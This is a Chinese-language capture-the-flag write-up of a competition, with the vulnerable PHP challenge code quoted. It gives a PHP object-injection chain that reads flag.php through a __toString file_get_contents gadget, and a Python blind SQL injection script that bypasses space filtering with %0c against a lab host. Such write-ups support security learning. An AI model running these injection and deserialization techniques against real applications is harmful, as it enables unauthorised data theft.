比赛难度不高,但是前期网络连接一直有问题,导致我很长一段时间没有连上网络,无法登录竞赛平台,也看不了题目,只好和队友用一台电脑..... 中期成绩一度第一,但是后面被邮电赶超了,只拿到了第三名(悲);
Web
two
<?php
highlight_file(__FILE__);
error_reporting(0);
include("ans.php");
if(isset($_GET["one"]) && isset($_GET["two"]) && isset($_POST["three"]))
{
$one = $_GET["one"];
$two = $_GET["two"];
$three = $_POST["three"];
if(!empty($one) && !empty($two) && !empty($three))
{
if(file_get_contents($two) === "g00dJ0b" and file_get_contents($three) === "onTh1s")
{
echo "bypass";
var_dump($one);
include($one);
}
}
else
die("Insufficient Parameters");
}
Lesen
<?php
error_reporting(0);
highlight_file(__FILE__);
$from = $_GET['from'];
$to = $_GET['to'];
if(!isset($from) or !isset($to) or stripos($from, "flag")!=FALSE)
{
$from = "behind.php";
}
include($from);// read flag.php
if(isset($to))
{
$a = unserialize($to);
$a->sayTheFlag();
}
发现直接通过include()不可能直接读取到flag.php,所以我们读一下behind.php,然后base64解码一下得到behind.php源码:
<?php
error_reporting(0);
class Test
{
public $notthis;
public $variable;
public function __call($t1, $t2)
{
print($this->notthis);
}
}
class NoUse
{
public $notthis;
public $class;
public function __toString()
{
return file_get_contents($this->notthis);
}
}
?>
分析behind.php源码,发现存在file_get_contents(),因此我们只需要使得其包含flag.php即可;
<?php
error_reporting(0);
class Test
{
public $notthis;
public $variable;
}
class NoUse
{
public $notthis;
public $class;
}
$a = new Test;
$b = new NoUse;
$b->notthis = 'flag.php';
$a->notthis = $b;
echo serialize($a);
?>
SQL
题目和[CISCN 2019华北Day2]Web1非常像,但是比赛的时候没做出来....
解法:用%0c替换空格,用or盲注即可
import requests
import string
flag=''
url='http://192.168.10.165:58003/?id='
for i in range(1,50):
for j in range(40,127):
#print(1)
#payload="0'%0cor%0c(substr(database(),{},1)='{}')".format(i,a)
#print(a)
payload="0'%0cor%0cif((ascii(substr((select%0cF1ag%0cfrom%0cTheFl4g),{},1))={}),1,0)%0c".format(i,j)
payload=payload+"%23"
res=requests.get(url=url+payload)
if "Zhangsan" in res.text:
flag+=chr(j)
print(flag)
break
print(flag)
Misc
流量分析(150分)
五彩斑斓的青春(100分)
根据提示,提取数据,然后将负数清洗掉,再Hex解码即可得到Flag